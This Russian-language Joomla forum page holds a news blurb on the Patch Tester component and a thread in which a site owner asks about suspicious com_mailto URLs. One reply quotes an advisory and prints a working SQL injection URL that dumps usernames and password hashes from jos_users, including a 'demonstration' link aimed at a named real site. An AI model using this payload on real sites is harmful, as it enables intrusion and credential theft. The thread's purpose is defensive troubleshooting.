Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

0 Пользователей и 1 Гость просматривают эту тему.
  • 3 Ответов
  • 3001 Просмотров
*

imisterio

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Собственно на сайте заметил недавно тысячи подобных страниц
Код
component/mailto/?tmpl=component&link=многосимвольная зашифрованная хрень
Может кто-нибудь подсказать что это? Есть подозрение что это спам ссылками по моему сайту. Как это убрать?
*

Index

  • Захожу иногда
  • 59
  • 3 / 0
  • Ибо - воистину!!!
Не удивляйтесь, инфа взята с www.xakep.ru

Joomla Component MailTo

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «article» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

/index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+ concat(username,char(58),password)KHG+from+jos_users--&Itemid=1

Демонстрация:

http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1= 2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
*

imisterio

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Спасибо. Можно как-то вообще отключить эту функцию?
*

imisterio

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Выключить компонент MailTo походу где-то надо.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Каков ваш заработок на сайте?возможно ли пролететь и создать не прибыльный сайт?

Автор bedalex

Ответов: 3
Просмотров: 5417
Последний ответ 05.06.2023, 11:00:40
от Ритулька88
Проблемы с входом на сайт

Автор belovpaha

Ответов: 7
Просмотров: 4827
Последний ответ 20.09.2022, 14:30:51
от sivers
Криво работает сайт и админ часть

Автор Odyssey

Ответов: 11
Просмотров: 2869
Последний ответ 10.02.2019, 06:13:39
от Odyssey
Сайт на Joomla 1.5.15

Автор Lzrv

Ответов: 3
Просмотров: 2555
Последний ответ 01.11.2017, 13:01:26
от SeBun
Подскажите - сайт стал в фронтэнде выводить ошибку. Как ее убрать

Автор vovchikku

Ответов: 7
Просмотров: 2114
Последний ответ 30.01.2017, 10:35:49
от vovchikku